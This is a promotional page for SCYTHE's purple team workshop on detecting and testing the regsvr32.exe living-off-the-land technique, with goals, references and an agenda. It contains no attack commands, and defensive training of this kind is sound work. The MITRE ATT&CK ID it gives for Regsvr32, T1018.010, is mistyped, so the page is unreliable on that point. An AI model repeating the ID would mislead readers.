Watch SCYTHE's Technical Director, Tim Schulz, conduct a 90-minute Hands-On Purple Team Exercise Workshop!

Topic: Purple Process: RegSvr32.exe

Living off the Land Binaries and Scripts (LOLBAS) can be difficult for defenders to catch due to the legitimate use cases offered by these programs that occur in enterprise environments. These techniques offer the perfect opportunity to leverage a purple team exercise to:

1. Establish a baseline understanding of an organization’s ability to log and detect these actions
2. Build more resilient defenses by tuning these detections to decrease false positives

The SCYTHE Labs team will walk attendees through the process of building and executing a test for the regsvr32.exe procedure. By the end of this workshop, attendees will:

• Know how to build a test with regsvr32.exe as an execution method
• Walk away with some techniques for reducing false positives within an environment
• Gather metrics that are built into an executive report for purple team exercise readout

For more information about regsvr32 and our purple team process, check out the following:
LOLBAS Project Repository Page
MITRE ATT&CK: Regsvr32 T1018.010
Purple Team Exercise Framework

General Agenda: (90 minutes total)
5 minutes of kickoff / introduction
10 minutes of lecture / background information
50 minutes of lab time
10 minutes of SCYTHE familiarization / set up test
40 minutes of Test / Detection Engineering / Re-run to validate
10 minutes of executive briefing / reporting / metrics
15 minutes of Q&A

Fill out the form below to watch on-demand!